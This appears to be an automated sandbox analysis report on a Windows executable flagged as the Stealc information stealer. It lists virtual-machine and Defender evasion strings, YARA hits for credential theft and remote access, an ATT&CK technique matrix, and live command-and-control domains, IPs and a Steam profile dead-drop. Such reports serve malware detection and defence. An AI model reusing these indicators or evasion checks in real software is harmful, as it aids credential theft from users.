                  Source: 66DJ2wErLz.exe, 00000000.00000003.2308346099.0000000000B3C000.00000004.00000020.00020000.00000000.sdmp, 66DJ2wErLz.exe, 00000000.00000003.2308517808.0000000000B46000.00000004.00000020.00020000.00000000.sdmp, 66DJ2wErLz.exe, 00000000.00000003.2297866309.0000000000B3C000.00000004.00000020.00020000.00000000.sdmp, 66DJ2wErLz.exe, 00000000.00000002.2375353411.0000000000B47000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                  Source: Amcache.hve.8.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                  Source: Amcache.hve.8.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
                  Source: 66DJ2wErLz.exe, 00000000.00000002.2375237608.0000000000B07000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                  Source: Amcache.hve.8.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
                  Source: Amcache.hve.8.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                  Source: Amcache.hve.8.drBinary or memory string: vmci.sys
                  Source: Amcache.hve.8.drBinary or memory string: vmci.syshbin`
                  Source: Amcache.hve.8.drBinary or memory string: \driver\vmci,\driver\pci
                  Source: Amcache.hve.8.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                  Source: Amcache.hve.8.drBinary or memory string: VMware20,1
                  Source: Amcache.hve.8.drBinary or memory string: Microsoft Hyper-V Generation Counter
                  Source: Amcache.hve.8.drBinary or memory string: NECVMWar VMware SATA CD00
                  Source: Amcache.hve.8.drBinary or memory string: VMware Virtual disk SCSI Disk Device
                  Source: Amcache.hve.8.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
                  Source: Amcache.hve.8.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
                  Source: Amcache.hve.8.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
                  Source: Amcache.hve.8.drBinary or memory string: VMware PCI VMCI Bus Device
                  Source: Amcache.hve.8.drBinary or memory string: VMware VMCI Bus Device
                  Source: Amcache.hve.8.drBinary or memory string: VMware Virtual RAM
                  Source: Amcache.hve.8.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
                  Source: Amcache.hve.8.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
                  Source: C:\Users\user\Desktop\66DJ2wErLz.exeCode function: 0_2_0043A9B0 LdrInitializeThunk,0_2_0043A9B0
                  Source: C:\Users\user\Desktop\66DJ2wErLz.exeCode function: 0_2_009E092B mov eax, dword ptr fs:[00000030h]0_2_009E092B
                  Source: C:\Users\user\Desktop\66DJ2wErLz.exeCode function: 0_2_009E0D90 mov eax, dword ptr fs:[00000030h]0_2_009E0D90
                  Source: C:\Users\user\Desktop\66DJ2wErLz.exeCode function: 0_2_00AC980B push dword ptr fs:[00000030h]0_2_00AC980B

                  HIPS / PFW / Operating System Protection Evasion

                  barindex
                  Source: 66DJ2wErLz.exeString found in binary or memory: debonairnukk.xyz
                  Source: 66DJ2wErLz.exeString found in binary or memory: diffuculttan.xyz
                  Source: 66DJ2wErLz.exeString found in binary or memory: effecterectz.xyz
                  Source: 66DJ2wErLz.exeString found in binary or memory: deafeninggeh.biz
                  Source: 66DJ2wErLz.exeString found in binary or memory: immureprech.biz
                  Source: C:\Users\user\Desktop\66DJ2wErLz.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                  Source: Amcache.hve.8.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
                  Source: Amcache.hve.8.drBinary or memory string: msmpeng.exe
                  Source: Amcache.hve.8.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
                  Source: Amcache.hve.8.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
                  Source: Amcache.hve.8.drBinary or memory string: MsMpEng.exe

                  Stealing of Sensitive Information

                  barindex
                  Source: Yara matchFile source: 0.3.66DJ2wErLz.exe.2550000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.66DJ2wErLz.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.3.66DJ2wErLz.exe.2550000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.66DJ2wErLz.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000000.00000003.2170541709.0000000002550000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.2375085451.00000000009E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.2374816093.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                  Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                  Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR

                  Remote Access Functionality

                  barindex
                  Source: Yara matchFile source: 0.3.66DJ2wErLz.exe.2550000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.66DJ2wErLz.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.3.66DJ2wErLz.exe.2550000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.66DJ2wErLz.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000000.00000003.2170541709.0000000002550000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.2375085451.00000000009E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.2374816093.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                  Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                  Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                  ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                  Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
                  PowerShell
                  1
                  DLL Side-Loading
                  1
                  Process Injection
                  1
                  Virtualization/Sandbox Evasion
                  OS Credential Dumping11
                  Security Software Discovery
                  Remote Services1
                  Screen Capture
                  11
                  Encrypted Channel
                  Exfiltration Over Other Network MediumAbuse Accessibility Features
                  CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
                  DLL Side-Loading
                  1
                  Process Injection
                  LSASS Memory1
                  Virtualization/Sandbox Evasion
                  Remote Desktop Protocol1
                  Archive Collected Data
                  1
                  Ingress Tool Transfer
                  Exfiltration Over BluetoothNetwork Denial of Service
                  Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)11
                  Deobfuscate/Decode Files or Information
                  Security Account Manager1
                  Process Discovery
                  SMB/Windows Admin Shares2
                  Clipboard Data
                  3
                  Non-Application Layer Protocol
                  Automated ExfiltrationData Encrypted for Impact
                  Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook4
                  Obfuscated Files or Information
                  NTDS2
                  System Information Discovery
                  Distributed Component Object ModelInput Capture114
                  Application Layer Protocol
                  Traffic DuplicationData Destruction
                  Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script22
                  Software Packing
                  LSA SecretsInternet Connection DiscoverySSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                  Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                  DLL Side-Loading
                  Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                  windows-stand
                  SourceDetectionScannerLabelLink
                  66DJ2wErLz.exe58%ReversingLabsWin32.Spyware.Stealc
                  66DJ2wErLz.exe100%Joe Sandbox ML
                  No Antivirus matches
                  No Antivirus matches
                  No Antivirus matches
                  SourceDetectionScannerLabelLink
                  https://awake-weaves.cyou/apius100%Avira URL Cloudmalware
                  https://wrathful-jammy.cyou/tucu100%Avira URL Cloudmalware
                  https://debonairnukk.xyz/apiow100%Avira URL Cloudmalware
                  https://sordid-snaked.cyou/apiam100%Avira URL Cloudmalware
                  https://help.steampowere0%Avira URL Cloudsafe
                  https://sordid-snaked.cyou/100%Avira URL Cloudmalware
                  https://sordid-snaked.cyou/apiV100%Avira URL Cloudmalware
                  NameIPActiveMaliciousAntivirus DetectionReputation
                  steamcommunity.com
                  23.55.153.106
                  truefalse
                    high
                    immureprech.biz
                    178.62.201.34
                    truefalse
                      high
                      deafeninggeh.biz
                      45.77.249.79
                      truefalse
                        high
                        fp2e7a.wpc.phicdn.net
                        192.229.221.95
                        truefalse
                          high
                          sordid-snaked.cyou
                          unknown
                          unknownfalse
                            high
                            diffuculttan.xyz
                            unknown
                            unknownfalse
                              high
                              effecterectz.xyz
                              unknown
                              unknownfalse
                                high
                                awake-weaves.cyou
                                unknown
                                unknownfalse
                                  high
                                  wrathful-jammy.cyou
                                  unknown
                                  unknownfalse
                                    high
                                    debonairnukk.xyz
                                    unknown
                                    unknownfalse
                                      high
                                      NameMaliciousAntivirus DetectionReputation
                                      sordid-snaked.cyoufalse
                                        high
                                        deafeninggeh.bizfalse
                                          high
                                          effecterectz.xyzfalse
                                            high
                                            wrathful-jammy.cyoufalse
                                              high
                                              https://steamcommunity.com/profiles/76561199724331900false
                                                high
                                                awake-weaves.cyoufalse
                                                  high
                                                  immureprech.bizfalse
                                                    high
                                                    https://immureprech.biz/apifalse
                                                      high
                                                      debonairnukk.xyzfalse
                                                        high
                                                        diffuculttan.xyzfalse
                                                          high
                                                          https://deafeninggeh.biz/apifalse
                                                            high
                                                            NameSourceMaliciousAntivirus DetectionReputation
                                                            https://community.fastly.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png66DJ2wErLz.exe, 00000000.00000003.2308317654.0000000000BA3000.00000004.00000020.00020000.00000000.sdmp, 66DJ2wErLz.exe, 00000000.00000003.2297807932.0000000000B9D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              high
                                                              https://player.vimeo.com66DJ2wErLz.exe, 00000000.00000003.2297807932.0000000000B93000.00000004.00000020.00020000.00000000.sdmp, 66DJ2wErLz.exe, 00000000.00000003.2297807932.0000000000B96000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                high
                                                                https://community.fastly.steamstatic.com/public/css/promo/summer2017/stickers.css?v=Ncr6N09yZIap&amp66DJ2wErLz.exe, 00000000.00000003.2308317654.0000000000BA3000.00000004.00000020.00020000.00000000.sdmp, 66DJ2wErLz.exe, 00000000.00000003.2297807932.0000000000B9D000.00000004.00000020.00020000.00000000.sdmp, 66DJ2wErLz.exe, 00000000.00000003.2297807932.0000000000B96000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  high
                                                                  https://steamcommunity.com/?subsection=broadcasts66DJ2wErLz.exe, 00000000.00000003.2308317654.0000000000BA3000.00000004.00000020.00020000.00000000.sdmp, 66DJ2wErLz.exe, 00000000.00000003.2297807932.0000000000B9D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    high
                                                                    https://sordid-snaked.cyou/apiV66DJ2wErLz.exe, 00000000.00000003.2308346099.0000000000B3C000.00000004.00000020.00020000.00000000.sdmp, 66DJ2wErLz.exe, 00000000.00000003.2308517808.0000000000B46000.00000004.00000020.00020000.00000000.sdmp, 66DJ2wErLz.exe, 00000000.00000003.2297866309.0000000000B3C000.00000004.00000020.00020000.00000000.sdmp, 66DJ2wErLz.exe, 00000000.00000002.2375353411.0000000000B47000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: malware
                                                                    unknown
                                                                    https://store.steampowered.com/subscriber_agreement/66DJ2wErLz.exe, 00000000.00000003.2308317654.0000000000BA3000.00000004.00000020.00020000.00000000.sdmp, 66DJ2wErLz.exe, 00000000.00000003.2297807932.0000000000B9D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      high
                                                                      https://www.gstatic.cn/recaptcha/66DJ2wErLz.exe, 00000000.00000002.2375353411.0000000000B92000.00000004.00000020.00020000.00000000.sdmp, 66DJ2wErLz.exe, 00000000.00000003.2297807932.0000000000B96000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        high
                                                                        http://www.valvesoftware.com/legal.htm66DJ2wErLz.exe, 00000000.00000003.2308317654.0000000000BA3000.00000004.00000020.00020000.00000000.sdmp, 66DJ2wErLz.exe, 00000000.00000003.2297807932.0000000000B9D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          high
                                                                          https://community.fastly.steamstatic.com/public/shared/css/shared_global.css?v=wuA4X_n5-mo0&l=en66DJ2wErLz.exe, 00000000.00000003.2308317654.0000000000BA3000.00000004.00000020.00020000.00000000.sdmp, 66DJ2wErLz.exe, 00000000.00000003.2297807932.0000000000B9D000.00000004.00000020.00020000.00000000.sdmp, 66DJ2wErLz.exe, 00000000.00000003.2297807932.0000000000B96000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            high
                                                                            https://www.youtube.com66DJ2wErLz.exe, 00000000.00000003.2297807932.0000000000B93000.00000004.00000020.00020000.00000000.sdmp, 66DJ2wErLz.exe, 00000000.00000003.2297807932.0000000000B96000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              high
                                                                              https://www.google.com66DJ2wErLz.exe, 00000000.00000003.2297807932.0000000000B93000.00000004.00000020.00020000.00000000.sdmp, 66DJ2wErLz.exe, 00000000.00000003.2297807932.0000000000B96000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                high
                                                                                https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback66DJ2wErLz.exe, 00000000.00000003.2308317654.0000000000BA3000.00000004.00000020.00020000.00000000.sdmp, 66DJ2wErLz.exe, 00000000.00000003.2297807932.0000000000B9D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  https://community.fastly.steamstatic.com/public/javascript/applications/community/libraries~b28b7af666DJ2wErLz.exe, 00000000.00000003.2308317654.0000000000BA3000.00000004.00000020.00020000.00000000.sdmp, 66DJ2wErLz.exe, 00000000.00000003.2297866309.0000000000B13000.00000004.00000020.00020000.00000000.sdmp, 66DJ2wErLz.exe, 00000000.00000003.2297807932.0000000000B9D000.00000004.00000020.00020000.00000000.sdmp, 66DJ2wErLz.exe, 00000000.00000003.2297807932.0000000000B96000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/66DJ2wErLz.exe, 00000000.00000002.2375353411.0000000000B92000.00000004.00000020.00020000.00000000.sdmp, 66DJ2wErLz.exe, 00000000.00000003.2297807932.0000000000B96000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      https://community.fastly.steamstatic.com/public/shared/css/motiva_sans.css?v=-yZgCk0Nu7kH&l=engl66DJ2wErLz.exe, 00000000.00000003.2297807932.0000000000B96000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        https://community.fastly.steamstatic.com/public/css/skin_1/profilev2.css?v=fe66ET2uI50l&l=englis66DJ2wErLz.exe, 00000000.00000003.2308317654.0000000000BA3000.00000004.00000020.00020000.00000000.sdmp, 66DJ2wErLz.exe, 00000000.00000003.2297807932.0000000000B9D000.00000004.00000020.00020000.00000000.sdmp, 66DJ2wErLz.exe, 00000000.00000003.2297807932.0000000000B96000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          high
                                                                                          https://community.fastly.steamstatic.com/public/javascript/applications/community/main.js?v=Cx79WC7T66DJ2wErLz.exe, 00000000.00000003.2308317654.0000000000BA3000.00000004.00000020.00020000.00000000.sdmp, 66DJ2wErLz.exe, 00000000.00000003.2297866309.0000000000B13000.00000004.00000020.00020000.00000000.sdmp, 66DJ2wErLz.exe, 00000000.00000003.2297807932.0000000000B9D000.00000004.00000020.00020000.00000000.sdmp, 66DJ2wErLz.exe, 00000000.00000003.2297807932.0000000000B96000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            high
                                                                                            https://community.fastly.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=pbdAKOcDIgbC66DJ2wErLz.exe, 00000000.00000003.2308317654.0000000000BA3000.00000004.00000020.00020000.00000000.sdmp, 66DJ2wErLz.exe, 00000000.00000003.2297807932.0000000000B9D000.00000004.00000020.00020000.00000000.sdmp, 66DJ2wErLz.exe, 00000000.00000003.2297807932.0000000000B96000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              high
                                                                                              https://s.ytimg.com;66DJ2wErLz.exe, 00000000.00000002.2375353411.0000000000B92000.00000004.00000020.00020000.00000000.sdmp, 66DJ2wErLz.exe, 00000000.00000003.2297807932.0000000000B96000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                high
                                                                                                https://community.fastly.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=166DJ2wErLz.exe, 00000000.00000003.2308317654.0000000000BA3000.00000004.00000020.00020000.00000000.sdmp, 66DJ2wErLz.exe, 00000000.00000003.2297807932.0000000000B9D000.00000004.00000020.00020000.00000000.sdmp, 66DJ2wErLz.exe, 00000000.00000002.2375237608.0000000000B07000.00000004.00000020.00020000.00000000.sdmp, 66DJ2wErLz.exe, 00000000.00000003.2297807932.0000000000B96000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  high
                                                                                                  https://community.fastly.steamstatic.com/public/shared/css/buttons.css?v=qhQgyjWi6LgJ&l=english&66DJ2wErLz.exe, 00000000.00000003.2308317654.0000000000BA3000.00000004.00000020.00020000.00000000.sdmp, 66DJ2wErLz.exe, 00000000.00000003.2297807932.0000000000B9D000.00000004.00000020.00020000.00000000.sdmp, 66DJ2wErLz.exe, 00000000.00000003.2297807932.0000000000B96000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    high
                                                                                                    https://community.fastly.steamstatic.com/66DJ2wErLz.exe, 00000000.00000003.2297807932.0000000000B96000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      high
                                                                                                      https://steam.tv/66DJ2wErLz.exe, 00000000.00000002.2375353411.0000000000B92000.00000004.00000020.00020000.00000000.sdmp, 66DJ2wErLz.exe, 00000000.00000003.2297807932.0000000000B96000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        high
                                                                                                        https://community.fastly.steamstatic.com/public/javascript/webui/clientcom.js?v=ImL_uti9QFBw&l=e66DJ2wErLz.exe, 00000000.00000003.2308317654.0000000000BA3000.00000004.00000020.00020000.00000000.sdmp, 66DJ2wErLz.exe, 00000000.00000003.2297807932.0000000000B9D000.00000004.00000020.00020000.00000000.sdmp, 66DJ2wErLz.exe, 00000000.00000003.2297807932.0000000000B96000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          high
                                                                                                          https://community.fastly.steamstatic.com/public/javascript/applications/community/manifest.js?v=foEB66DJ2wErLz.exe, 00000000.00000003.2308317654.0000000000BA3000.00000004.00000020.00020000.00000000.sdmp, 66DJ2wErLz.exe, 00000000.00000003.2297866309.0000000000B13000.00000004.00000020.00020000.00000000.sdmp, 66DJ2wErLz.exe, 00000000.00000003.2297807932.0000000000B9D000.00000004.00000020.00020000.00000000.sdmp, 66DJ2wErLz.exe, 00000000.00000003.2297807932.0000000000B96000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            high
                                                                                                            https://community.fastly.steamstatic.com/public/javascript/promo/stickers.js?v=CcLRHsa04otQ&l=en66DJ2wErLz.exe, 00000000.00000003.2308317654.0000000000BA3000.00000004.00000020.00020000.00000000.sdmp, 66DJ2wErLz.exe, 00000000.00000003.2297807932.0000000000B9D000.00000004.00000020.00020000.00000000.sdmp, 66DJ2wErLz.exe, 00000000.00000003.2297807932.0000000000B96000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                              high
                                                                                                              http://store.steampowered.com/privacy_agreement/66DJ2wErLz.exe, 00000000.00000003.2308317654.0000000000BA3000.00000004.00000020.00020000.00000000.sdmp, 66DJ2wErLz.exe, 00000000.00000003.2297866309.0000000000B13000.00000004.00000020.00020000.00000000.sdmp, 66DJ2wErLz.exe, 00000000.00000003.2297807932.0000000000B9D000.00000004.00000020.00020000.00000000.sdmp, 66DJ2wErLz.exe, 00000000.00000003.2297807932.0000000000B96000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                high
                                                                                                                https://store.steampowered.com/points/shop/66DJ2wErLz.exe, 00000000.00000003.2308317654.0000000000BA3000.00000004.00000020.00020000.00000000.sdmp, 66DJ2wErLz.exe, 00000000.00000003.2297807932.0000000000B9D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                  high
                                                                                                                  https://community.fastly.steamstatic.com/public/javascript/modalv2.js?v=zBXEuexVQ0FZ&l=english&a66DJ2wErLz.exe, 00000000.00000003.2308317654.0000000000BA3000.00000004.00000020.00020000.00000000.sdmp, 66DJ2wErLz.exe, 00000000.00000003.2297807932.0000000000B9D000.00000004.00000020.00020000.00000000.sdmp, 66DJ2wErLz.exe, 00000000.00000003.2297807932.0000000000B96000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                    high
                                                                                                                    https://sketchfab.com66DJ2wErLz.exe, 00000000.00000003.2297807932.0000000000B93000.00000004.00000020.00020000.00000000.sdmp, 66DJ2wErLz.exe, 00000000.00000003.2297807932.0000000000B96000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                      high
                                                                                                                      https://lv.queniujq.cn66DJ2wErLz.exe, 00000000.00000002.2375353411.0000000000B92000.00000004.00000020.00020000.00000000.sdmp, 66DJ2wErLz.exe, 00000000.00000003.2297807932.0000000000B96000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                        high
                                                                                                                        https://steamcommunity.com/profiles/76561199724331900/inventory/66DJ2wErLz.exe, 00000000.00000003.2308317654.0000000000BA3000.00000004.00000020.00020000.00000000.sdmp, 66DJ2wErLz.exe, 00000000.00000003.2297807932.0000000000B9D000.00000004.00000020.00020000.00000000.sdmp, 66DJ2wErLz.exe, 00000000.00000002.2375237608.0000000000B07000.00000004.00000020.00020000.00000000.sdmp, 66DJ2wErLz.exe, 00000000.00000003.2297807932.0000000000B96000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                          high
                                                                                                                          https://www.youtube.com/66DJ2wErLz.exe, 00000000.00000002.2375353411.0000000000B92000.00000004.00000020.00020000.00000000.sdmp, 66DJ2wErLz.exe, 00000000.00000003.2297807932.0000000000B96000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                            high
                                                                                                                            https://store.steampowered.com/privacy_agreement/66DJ2wErLz.exe, 00000000.00000003.2308317654.0000000000BA3000.00000004.00000020.00020000.00000000.sdmp, 66DJ2wErLz.exe, 00000000.00000003.2297807932.0000000000B9D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                              high
                                                                                                                              https://community.fastly.steamstatic.com/public/css/skin_1/modalContent.css?v=WXAusLHclDIt&l=eng66DJ2wErLz.exe, 00000000.00000003.2308317654.0000000000BA3000.00000004.00000020.00020000.00000000.sdmp, 66DJ2wErLz.exe, 00000000.00000003.2297807932.0000000000B9D000.00000004.00000020.00020000.00000000.sdmp, 66DJ2wErLz.exe, 00000000.00000003.2297807932.0000000000B96000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                high
                                                                                                                                https://awake-weaves.cyou/apius66DJ2wErLz.exe, 00000000.00000003.2297866309.0000000000B3C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                • Avira URL Cloud: malware
                                                                                                                                unknown
                                                                                                                                https://community.fastly.steamstatic.com/public/javascript/global.js?v=jWc2JLWHx5Kn&l=english&am66DJ2wErLz.exe, 00000000.00000003.2308317654.0000000000BA3000.00000004.00000020.00020000.00000000.sdmp, 66DJ2wErLz.exe, 00000000.00000003.2297807932.0000000000B9D000.00000004.00000020.00020000.00000000.sdmp, 66DJ2wErLz.exe, 00000000.00000003.2297807932.0000000000B96000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                  high
                                                                                                                                  https://www.google.com/recaptcha/66DJ2wErLz.exe, 00000000.00000003.2297807932.0000000000B96000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                    high
                                                                                                                                    https://checkout.steampowered.com/66DJ2wErLz.exe, 00000000.00000003.2297807932.0000000000B96000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                      high
                                                                                                                                      https://store.steampowered.com/;66DJ2wErLz.exe, 00000000.00000003.2297807932.0000000000B93000.00000004.00000020.00020000.00000000.sdmp, 66DJ2wErLz.exe, 00000000.00000003.2297807932.0000000000B96000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                        high
                                                                                                                                        https://store.steampowered.com/about/66DJ2wErLz.exe, 00000000.00000003.2297807932.0000000000B9D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                          high
                                                                                                                                          https://steamcommunity.com/my/wishlist/66DJ2wErLz.exe, 00000000.00000003.2308317654.0000000000BA3000.00000004.00000020.00020000.00000000.sdmp, 66DJ2wErLz.exe, 00000000.00000003.2297807932.0000000000B9D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                            high
                                                                                                                                            https://community.fastly.steamstatic.com/public/shared/css/shared_responsive.css?v=JL1e4uQSrVGe&66DJ2wErLz.exe, 00000000.00000003.2308317654.0000000000BA3000.00000004.00000020.00020000.00000000.sdmp, 66DJ2wErLz.exe, 00000000.00000003.2297807932.0000000000B9D000.00000004.00000020.00020000.00000000.sdmp, 66DJ2wErLz.exe, 00000000.00000003.2297807932.0000000000B96000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                              high
                                                                                                                                              https://help.steampowered.com/en/66DJ2wErLz.exe, 00000000.00000003.2308317654.0000000000BA3000.00000004.00000020.00020000.00000000.sdmp, 66DJ2wErLz.exe, 00000000.00000003.2297807932.0000000000B9D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                high
                                                                                                                                                https://steamcommunity.com/market/66DJ2wErLz.exe, 00000000.00000003.2308317654.0000000000BA3000.00000004.00000020.00020000.00000000.sdmp, 66DJ2wErLz.exe, 00000000.00000003.2297807932.0000000000B9D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                  high
                                                                                                                                                  https://store.steampowered.com/news/66DJ2wErLz.exe, 00000000.00000003.2308317654.0000000000BA3000.00000004.00000020.00020000.00000000.sdmp, 66DJ2wErLz.exe, 00000000.00000003.2297807932.0000000000B9D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                    high
                                                                                                                                                    http://store.steampowered.com/subscriber_agreement/66DJ2wErLz.exe, 00000000.00000003.2308317654.0000000000BA3000.00000004.00000020.00020000.00000000.sdmp, 66DJ2wErLz.exe, 00000000.00000003.2297866309.0000000000B13000.00000004.00000020.00020000.00000000.sdmp, 66DJ2wErLz.exe, 00000000.00000003.2297807932.0000000000B9D000.00000004.00000020.00020000.00000000.sdmp, 66DJ2wErLz.exe, 00000000.00000003.2297807932.0000000000B96000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                      high
                                                                                                                                                      https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org66DJ2wErLz.exe, 00000000.00000003.2308317654.0000000000BA3000.00000004.00000020.00020000.00000000.sdmp, 66DJ2wErLz.exe, 00000000.00000003.2297866309.0000000000B13000.00000004.00000020.00020000.00000000.sdmp, 66DJ2wErLz.exe, 00000000.00000003.2297807932.0000000000B9D000.00000004.00000020.00020000.00000000.sdmp, 66DJ2wErLz.exe, 00000000.00000003.2297807932.0000000000B96000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                        high
                                                                                                                                                        https://recaptcha.net/recaptcha/;66DJ2wErLz.exe, 00000000.00000003.2297807932.0000000000B93000.00000004.00000020.00020000.00000000.sdmp, 66DJ2wErLz.exe, 00000000.00000003.2297807932.0000000000B96000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                          high
                                                                                                                                                          https://steamcommunity.com/discussions/66DJ2wErLz.exe, 00000000.00000003.2308317654.0000000000BA3000.00000004.00000020.00020000.00000000.sdmp, 66DJ2wErLz.exe, 00000000.00000003.2297807932.0000000000B9D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                            high
                                                                                                                                                            https://sordid-snaked.cyou/66DJ2wErLz.exe, 00000000.00000003.2297866309.0000000000B19000.00000004.00000020.00020000.00000000.sdmpfalse
